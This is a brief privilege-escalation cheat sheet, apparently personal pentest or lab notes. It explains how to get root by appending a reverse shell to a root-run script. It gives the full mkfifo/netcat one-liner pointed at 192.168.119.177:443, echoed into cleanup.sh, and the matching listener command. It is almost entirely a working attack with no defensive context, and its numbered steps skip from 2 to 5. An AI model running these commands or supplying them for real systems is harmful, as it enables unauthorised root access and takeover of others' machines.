echo /bin/bash to executable file

If a script on target has root privileges, redirect a revshell and catch it with nc to get root

1)echo a bash reverse shell directly into the ....sh script

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.177 443 >/tmp/f" >> cleanup.sh

2)setup a listener on port 443 and wait for reverse shell

nc -nvlp 443

5)check out shell → #root